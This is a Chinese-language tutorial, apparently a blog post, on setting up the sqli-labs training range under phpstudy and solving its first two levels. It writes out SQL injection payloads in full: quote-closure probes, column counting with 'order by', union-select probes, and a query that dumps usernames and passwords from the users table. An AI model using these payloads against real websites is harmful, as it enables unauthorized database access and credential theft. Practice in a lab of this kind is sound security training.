靶场搭建
phpstudy安装就不说了
链接:https://pan.baidu.com/s/1Ng0uKX9kL0D3gRmGkRb9YA?pwd=pm00
提取码:pm00
下载后把文件解压到phpstudy安装路径的www文件夹下
用记事本打开phpstudy_pro\WWW\sqli-labs-master\sql-connections
目录下的db-creds.inc
文件
修改文件中的用户名与密码,要求与phpstudy中的数据库名字和密码一致
完成之后就可以在浏览器中尝试访问靶场了
如果在访问中出现报错,把报错的内容复制下来在浏览器中度娘几乎都能给出解答
案例复现
less-1
判断注入点
首先尝试输入id=1
判断闭合符号
?id=1' //报错
?id=1' --+
说明是’闭合
判断列数
?id=1' order by 3 --+
测试结果为3列
联合查询
id=-1' union select 1,2,3 --+
这一步的目的是给数据库一个不存在的id,然后看出我们输入的数据在哪里显示出来
这样一来,我们就可以在2,3处显示自己想要的内容了。
less-2
判断注入类型
1' and '1'='1
1 and 1=1
看页面回显位的反馈,如果一致,则是字符注入,否则就是数字注入。
所以less02是数字型注入 ,就不用了再添加闭合符号了
其他步骤跟第一关一样,所以我们直接获取账号密码
?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)